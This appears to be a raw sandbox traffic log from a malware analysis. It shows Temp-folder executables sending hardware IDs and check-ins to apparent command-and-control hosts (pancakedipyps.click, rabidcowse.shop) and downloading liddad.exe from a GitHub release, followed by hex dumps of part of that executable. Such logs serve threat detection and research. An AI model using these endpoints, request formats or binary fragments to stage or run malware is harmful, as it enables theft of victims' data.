                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  2025-01-03 08:50:17 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                  2025-01-03 08:50:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  10192.168.2.449883188.114.97.34436408C:\Users\user\AppData\Local\Temp\1001527001\legs.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-01-03 08:50:18 UTC286OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=BGSC7YBR9TA9ORBPLNS
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 20441
                                                                                                                                                                                                                                                  Host: pancakedipyps.click
                                                                                                                                                                                                                                                  2025-01-03 08:50:18 UTC15331OUTData Raw: 2d 2d 42 47 53 43 37 59 42 52 39 54 41 39 4f 52 42 50 4c 4e 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 39 43 38 39 41 45 33 41 37 34 38 45 45 46 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 42 47 53 43 37 59 42 52 39 54 41 39 4f 52 42 50 4c 4e 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 42 47 53 43 37 59 42 52 39 54 41 39 4f 52 42 50 4c 4e 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 64 65
                                                                                                                                                                                                                                                  Data Ascii: --BGSC7YBR9TA9ORBPLNSContent-Disposition: form-data; name="hwid"F9C89AE3A748EEF1AC8923850305D13E--BGSC7YBR9TA9ORBPLNSContent-Disposition: form-data; name="pid"3--BGSC7YBR9TA9ORBPLNSContent-Disposition: form-data; name="lid"FATE99--de
                                                                                                                                                                                                                                                  2025-01-03 08:50:18 UTC5110OUTData Raw: 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3
                                                                                                                                                                                                                                                  Data Ascii: `M?lrQMn 64F6(X&7~`a
                                                                                                                                                                                                                                                  2025-01-03 08:50:19 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:19 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=bsrtg5dkpbeob3hl0jkaq5uvn9; expires=Tue, 29 Apr 2025 02:36:58 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rIrYcGSoobXjQ9AHzehZu%2B3CdGKWFHMASvaO5wImPMK1fFv6DbPIb2bl7qVO3KLYKEWHQufrh7w4L0%2BtUroTZK1ItUhoh%2BBWFyifHupn5oUVB4IqMKqIhPcK0L2Cyr8b8mIL6fE9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8fc1bd92fa2142ab-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1712&min_rtt=1711&rtt_var=645&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2848&recv_bytes=21407&delivery_rate=1692753&cwnd=204&unsent_bytes=0&cid=55bfcc8f63e65233&ts=710&x=0"
                                                                                                                                                                                                                                                  2025-01-03 08:50:19 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                  2025-01-03 08:50:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  11192.168.2.449893140.82.121.34432800C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-01-03 08:50:19 UTC95OUTGET /legendary6911331/zakaz2/releases/download/zakaz2/liddad.exe HTTP/1.1
                                                                                                                                                                                                                                                  Host: github.com
                                                                                                                                                                                                                                                  2025-01-03 08:50:20 UTC957INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                  Server: GitHub.com
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:20 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                  Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                                                                                                                  Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/910998942/245e975e-0c8d-48e8-a6d9-d07e7e1e6c8a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250103%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250103T085020Z&X-Amz-Expires=300&X-Amz-Signature=529769effe37e35e131f5039b89fb420ef6d2600ba248f0f6cc794883bc50b20&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dliddad.exe&response-content-type=application%2Foctet-stream
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                                                                                                  X-Frame-Options: deny
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                  2025-01-03 08:50:20 UTC3383INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                                                                                                                                                                                  Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  12192.168.2.449898172.67.156.1274437144C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-01-03 08:50:19 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 8
                                                                                                                                                                                                                                                  Host: rabidcowse.shop
                                                                                                                                                                                                                                                  2025-01-03 08:50:19 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                  Data Ascii: act=life
                                                                                                                                                                                                                                                  2025-01-03 08:50:20 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:20 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=di748tnba1co2sjjtckkqo6ttf; expires=Tue, 29 Apr 2025 02:36:59 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c3FlxaPzwfNP1u80i%2FNvnSJR8WtGr1dUEfQVHsSUpj5otVpik4QNNHMCtXQV%2FnRhyk86A8zZdZrjTDYsrt%2BFBCWV6X%2B2nmSarsARskYXBqbSksQwpcTWIAXKauRbZzYRVsU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8fc1bd9b5a56439c-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2316&min_rtt=2308&rtt_var=871&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2837&recv_bytes=906&delivery_rate=1265164&cwnd=224&unsent_bytes=0&cid=2798722a70c20314&ts=884&x=0"
                                                                                                                                                                                                                                                  2025-01-03 08:50:20 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 2ok
                                                                                                                                                                                                                                                  2025-01-03 08:50:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  13192.168.2.449907185.199.108.1334432800C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-01-03 08:50:20 UTC548OUTGET /github-production-release-asset-2e65be/910998942/245e975e-0c8d-48e8-a6d9-d07e7e1e6c8a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250103%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250103T085020Z&X-Amz-Expires=300&X-Amz-Signature=529769effe37e35e131f5039b89fb420ef6d2600ba248f0f6cc794883bc50b20&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dliddad.exe&response-content-type=application%2Foctet-stream HTTP/1.1
                                                                                                                                                                                                                                                  Host: objects.githubusercontent.com
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  2025-01-03 08:50:20 UTC843INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Length: 7833736
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Last-Modified: Thu, 02 Jan 2025 02:34:48 GMT
                                                                                                                                                                                                                                                  ETag: "0x8DD2AD60747369C"
                                                                                                                                                                                                                                                  Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                  x-ms-request-id: 483141ff-401e-0049-10be-5ca3be000000
                                                                                                                                                                                                                                                  x-ms-version: 2024-11-04
                                                                                                                                                                                                                                                  x-ms-creation-time: Thu, 02 Jan 2025 02:34:48 GMT
                                                                                                                                                                                                                                                  x-ms-blob-content-md5: ZheOdoKflHch7l+ZVDTTfw==
                                                                                                                                                                                                                                                  x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                  x-ms-lease-state: available
                                                                                                                                                                                                                                                  x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename=liddad.exe
                                                                                                                                                                                                                                                  x-ms-server-encrypted: true
                                                                                                                                                                                                                                                  Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                  Fastly-Restarts: 1
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Age: 0
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:20 GMT
                                                                                                                                                                                                                                                  X-Served-By: cache-iad-kcgs7200079-IAD, cache-nyc-kteb1890096-NYC
                                                                                                                                                                                                                                                  X-Cache: HIT, MISS
                                                                                                                                                                                                                                                  X-Cache-Hits: 267, 0
                                                                                                                                                                                                                                                  X-Timer: S1735894221.815667,VS0,VE8
                                                                                                                                                                                                                                                  2025-01-03 08:50:20 UTC1378INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 c4 35 72 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 8c 4d 00 00 7e 77 00 00 32 00 00 a0 14 00 00 00 10 00 00 00 a0 4d 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 78 00 00 04 00 00 3b 15 78 00 02 00 40 01 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL5rg(M~w2M@x;x@
                                                                                                                                                                                                                                                  2025-01-03 08:50:20 UTC1378INData Raw: 24 04 83 e4 f0 31 c0 ff 71 fc 55 89 e5 57 56 8d 55 a4 53 89 d7 51 b9 11 00 00 00 83 ec 78 8b 35 58 46 b4 00 f3 ab 85 f6 0f 85 a0 02 00 00 64 a1 18 00 00 00 8b 35 7c 6a b4 00 8b 78 04 31 db eb 19 8d 74 26 00 90 39 c7 0f 84 20 02 00 00 c7 04 24 e8 03 00 00 ff d6 83 ec 04 89 d8 f0 0f b1 3d 34 46 b4 00 85 c0 75 de a1 38 46 b4 00 31 db 83 f8 01 0f 84 09 02 00 00 a1 38 46 b4 00 85 c0 0f 84 79 02 00 00 c7 05 10 20 b4 00 01 00 00 00 a1 38 46 b4 00 83 f8 01 0f 84 fe 01 00 00 85 db 0f 84 1c 02 00 00 a1 9c 2e b3 00 85 c0 74 1c c7 44 24 08 00 00 00 00 c7 44 24 04 02 00 00 00 c7 04 24 00 00 00 00 ff d0 83 ec 0c e8 af 81 38 00 c7 04 24 50 97 78 00 ff 15 78 6a b4 00 83 ec 04 a3 70 46 b4 00 c7 04 24 00 10 40 00 e8 ee 7a 38 00 e8 b9 7f 38 00 c7 05 08 20 b4 00 00 00 40 00
                                                                                                                                                                                                                                                  Data Ascii: $1qUWVUSQx5XFd5|jx1t&9 $=4Fu8F18Fy 8F.tD$D$$8$PxxjpF$@z88 @
                                                                                                                                                                                                                                                  2025-01-03 08:50:20 UTC1378INData Raw: c3 55 89 e5 5d c3 55 89 e5 5d c3 55 89 e5 5d c3 55 89 e5 5d c3 55 89 e5 5d c3 55 89 e5 5d c3 55 89 e5 83 ec 28 8b 45 0c 0f af 45 10 89 45 f4 8b 45 14 8b 50 04 8b 45 f4 01 d0 8d 50 01 8b 45 14 8b 00 89 54 24 04 89 04 24 e8 ce 76 38 00 8b 55 14 89 02 8b 45 14 8b 00 85 c0 75 25 c7 04 24 02 00 00 00 a1 28 6c b4 00 ff d0 c7 44 24 04 60 e1 9e 00 89 04 24 e8 72 fe ff ff b8 00 00 00 00 eb 47 8b 45 14 8b 10 8b 45 14 8b 40 04 01 c2 8b 45 f4 89 44 24 08 8b 45 08 89 44 24 04 89 14 24 e8 18 76 38 00 8b 45 14 8b 50 04 8b 45 f4 01 c2 8b 45 14 89 50 04 8b 45 14 8b 10 8b 45 14 8b 40 04 01 d0 c6 00 00 8b 45 f4 c9 c3 55 89 e5 83 ec 28 8b 45 0c 0f af 45 10 89 45 f4 8b 45 14 89 45 f0 8b 45 f0 8b 50 04 8b 45 f4 01 d0 8d 50 01 8b 45 f0 8b 00 89 54 24 04 89 04 24 e8 1d 76 38 00
                                                                                                                                                                                                                                                  Data Ascii: U]U]U]U]U]U]U(EEEEPEPET$$v8UEu%$(lD$`$rGEE@ED$ED$$v8EPEEPEE@EU(EEEEEEPEPET$$v8
                                                                                                                                                                                                                                                  2025-01-03 08:50:20 UTC1378INData Raw: 01 00 c7 45 cc 2b 4e 00 00 c7 44 24 08 8e 17 40 00 8b 45 cc 89 44 24 04 8b 45 d4 89 04 24 e8 a7 a5 01 00 c7 45 c8 11 27 00 00 8d 45 b4 89 44 24 08 8b 45 c8 89 44 24 04 8b 45 d4 89 04 24 e8 87 a5 01 00 c7 45 c4 6f 4e 00 00 c7 44 24 08 30 18 40 00 8b 45 c4 89 44 24 04 8b 45 d4 89 04 24 e8 66 a5 01 00 c7 45 c0 2d 27 00 00 8d 45 a8 89 44 24 08 8b 45 c0 89 44 24 04 8b 45 d4 89 04 24 e8 46 a5 01 00 8b 45 f4 83 c0 01 89 44 24 04 c7 04 24 3c e3 9e 00 e8 1d f9 ff ff 8b 45 d4 89 04 24 e8 85 1f 00 00 89 45 bc 83 7d bc 00 75 6f 8b 45 f4 83 c0 01 89 44 24 04 c7 04 24 6c e3 9e 00 e8 f3 f8 ff ff 8b 55 b4 8b 45 0c 89 10 8b 55 b8 8b 45 14 89 10 8b 45 a8 85 c0 74 14 8b 45 a8 89 04 24 e8 e4 6e 38 00 89 c2 8b 45 10 89 10 eb 09 8b 45 10 c7 00 00 00 00 00 8b 45 ac 89 04 24 e8
                                                                                                                                                                                                                                                  Data Ascii: E+ND$@ED$E$E'ED$ED$E$EoND$0@ED$E$fE-'ED$ED$E$FED$$<E$E}uoED$$lUEUEEtE$n8EEE$
                                                                                                                                                                                                                                                  2025-01-03 08:50:20 UTC1378INData Raw: 24 e8 8b f4 ff ff c7 45 e4 12 27 00 00 8d 85 64 ff ff ff 89 44 24 08 8b 45 e4 89 44 24 04 8b 45 e8 89 04 24 e8 3f a0 01 00 c7 45 e0 2b 4e 00 00 c7 44 24 08 e3 16 40 00 8b 45 e0 89 44 24 04 8b 45 e8 89 04 24 e8 1e a0 01 00 c7 45 dc 11 27 00 00 8d 45 c8 89 44 24 08 8b 45 dc 89 44 24 04 8b 45 e8 89 04 24 e8 fe 9f 01 00 c7 45 d8 40 00 00 00 c7 44 24 08 00 00 00 00 8b 45 d8 89 44 24 04 8b 45 e8 89 04 24 e8 dd 9f 01 00 c7 45 d4 51 00 00 00 c7 44 24 08 00 00 00 00 8b 45 d4 89 44 24 04 8b 45 e8 89 04 24 e8 bc 9f 01 00 8b 45 e8 89 04 24 e8 11 1a 00 00 89 45 d0 8b 45 e8 89 04 24 e8 83 1b 00 00 83 7d d0 00 75 23 8b 45 f4 83 c0 01 89 44 24 04 c7 04 24 a4 e4 9e 00 e8 74 f3 ff ff e8 42 18 00 00 8b 45 c8 e9 8e 00 00 00 8b 45 d0 89 04 24 e8 8f ad 01 00 89 c3 8b 45 f4 8d
                                                                                                                                                                                                                                                  Data Ascii: $E'dD$ED$E$?E+ND$@ED$E$E'ED$ED$E$E@D$ED$E$EQD$ED$E$E$EE$}u#ED$$tBEE$E
                                                                                                                                                                                                                                                  2025-01-03 08:50:20 UTC1378INData Raw: e8 89 04 24 e8 ed f7 4c 00 8b 85 e8 e6 ff ff 8b 95 ec e6 ff ff 0f ac d0 1e c1 ea 1e 89 85 e4 e6 ff ff db 85 e4 e6 ff ff dd 1c 24 e8 c6 f4 4c 00 89 44 24 08 c7 44 24 04 56 e5 9e 00 8b 45 e8 89 04 24 e8 af f7 4c 00 8b 45 e8 89 44 24 04 8b 45 ec 89 04 24 e8 0d db 4c 00 8b 45 f4 89 04 24 e8 4a 64 38 00 83 c0 01 01 45 f4 8b 45 f4 0f b6 00 84 c0 0f 85 da fe ff ff 8b 45 ec 89 44 24 08 c7 44 24 04 5b e5 9e 00 8b 45 08 89 04 24 e8 64 f7 4c 00 c7 85 64 fb ff ff 00 00 00 00 8d 85 64 fb ff ff 89 44 24 0c c7 44 24 08 3b 25 40 00 c7 44 24 04 00 00 00 00 c7 04 24 00 00 00 00 a1 58 6d b4 00 ff d0 83 ec 10 8b 85 64 fb ff ff 89 04 24 e8 31 f5 4c 00 89 44 24 08 c7 44 24 04 63 e5 9e 00 8b 45 08 89 04 24 e8 0a f7 4c 00 c7 04 24 00 00 00 00 a1 6c 6d b4 00 ff d0 83 ec 04 89 45
                                                                                                                                                                                                                                                  Data Ascii: $L$LD$D$VE$LED$E$LE$Jd8EEED$D$[E$dLddD$D$;%@D$$Xmd$1LD$D$cE$L$lmE
                                                                                                                                                                                                                                                  2025-01-03 08:50:20 UTC1378INData Raw: ec 04 c7 44 24 04 33 e6 9e 00 8d 85 43 fb ff ff 89 04 24 e8 3c 61 38 00 85 c0 74 07 b8 d4 e5 9e 00 eb 05 b8 d6 e5 9e 00 89 04 24 e8 d4 f1 4c 00 89 44 24 08 c7 44 24 04 3e e6 9e 00 8b 45 08 89 04 24 e8 4d f2 4c 00 c6 45 be 31 8d 95 14 fa ff ff b8 00 00 00 00 b9 4a 00 00 00 89 d7 f3 ab c7 85 48 fc ff ff 28 01 00 00 c7 44 24 04 00 00 00 00 c7 04 24 02 00 00 00 e8 b7 61 38 00 83 ec 08 89 45 d4 8d 85 14 fa ff ff 89 44 24 04 8b 45 d4 89 04 24 e8 8c 61 38 00 83 ec 08 85 c0 0f 84 e0 00 00 00 c7 44 24 08 04 01 00 00 8d 85 14 fa ff ff 83 c0 24 89 44 24 04 8d 85 0f f9 ff ff 89 04 24 e8 9e 5e 38 00 c6 85 13 fa ff ff 00 c7 44 24 04 04 01 00 00 8d 85 0f f9 ff ff 89 04 24 a1 ac 6c b4 00 ff d0 c7 44 24 04 42 e6 9e 00 8d 85 0f f9 ff ff 89 04 24 e8 59 60 38 00 85 c0 75 4e
                                                                                                                                                                                                                                                  Data Ascii: D$3C$<a8t$LD$D$>E$MLE1JH(D$$a8ED$E$a8D$$D$$^8D$$lD$B$Y`8uN
                                                                                                                                                                                                                                                  2025-01-03 08:50:20 UTC1378INData Raw: 5e fe ff ff 8b 85 64 ff ff ff 89 04 24 a1 58 68 b4 00 ff d0 83 ec 04 83 45 f0 01 83 7d f0 02 0f 8e be fd ff ff 90 90 c9 c3 55 89 e5 81 ec 58 01 00 00 c7 44 24 04 00 00 00 00 c7 04 24 02 00 00 00 e8 8c 5c 38 00 83 ec 08 89 45 f4 83 7d f4 ff 75 23 c7 04 24 02 00 00 00 a1 28 6c b4 00 ff d0 c7 44 24 04 30 e7 9e 00 89 04 24 e8 92 e3 ff ff e9 e3 00 00 00 c7 85 c4 fe ff ff 28 01 00 00 e8 be e8 4c 00 89 45 f0 8d 85 c4 fe ff ff 89 44 24 04 8b 45 f4 89 04 24 e8 26 5c 38 00 83 ec 08 85 c0 0f 84 87 00 00 00 e8 66 eb 4c 00 89 45 ec 8d 85 c4 fe ff ff 83 c0 24 89 04 24 e8 e2 eb 4c 00 89 44 24 08 c7 44 24 04 4d e5 9e 00 8b 45 ec 89 04 24 e8 5b ec 4c 00 8b 85 cc fe ff ff 89 04 24 e8 5d ea 4c 00 89 44 24 08 c7 44 24 04 52 e7 9e 00 8b 45 ec 89 04 24 e8 36 ec 4c 00 8b 45 ec
                                                                                                                                                                                                                                                  Data Ascii: ^d$XhE}UXD$$\8E}u#$(lD$0$(LED$E$&\8fLE$$LD$D$ME$[L$]LD$D$RE$6LE
                                                                                                                                                                                                                                                  2025-01-03 08:50:20 UTC1378INData Raw: c7 44 24 04 20 e3 9e 00 89 04 24 e8 90 de ff ff 8b 45 10 8b 00 89 04 24 e8 a3 56 38 00 b8 ff ff ff ff e9 de 01 00 00 c7 45 e4 12 27 00 00 8b 45 08 89 44 24 08 8b 45 e4 89 44 24 04 8b 45 e8 89 04 24 e8 99 8a 01 00 c7 45 e0 1f 27 00 00 8b 45 0c 89 44 24 08 8b 45 e0 89 44 24 04 8b 45 e8 89 04 24 e8 79 8a 01 00 c7 45 dc 00 00 00 00 c7 44 24 04 54 e8 9e 00 8b 45 dc 89 04 24 e8 df 8e 01 00 89 45 dc c7 45 d8 27 27 00 00 8b 45 dc 89 44 24 08 8b 45 d8 89 44 24 04 8b 45 e8 89 04 24 e8 3c 8a 01 00 c7 45 d4 40 00 00 00 c7 44 24 08 00 00 00 00 8b 45 d4 89 44 24 04 8b 45 e8 89 04 24 e8 1b 8a 01 00 c7 45 d0 51 00 00 00 c7 44 24 08 00 00 00 00 8b 45 d0 89 44 24 04 8b 45 e8 89 04 24 e8 fa 89 01 00 c7 45 cc 2b 4e 00 00 c7 44 24 08 f7 35 40 00 8b 45 cc 89 44 24 04 8b 45 e8
                                                                                                                                                                                                                                                  Data Ascii: D$ $E$V8E'ED$ED$E$E'ED$ED$E$yED$TE$EE''ED$ED$E$<E@D$ED$E$EQD$ED$E$E+ND$5@ED$E
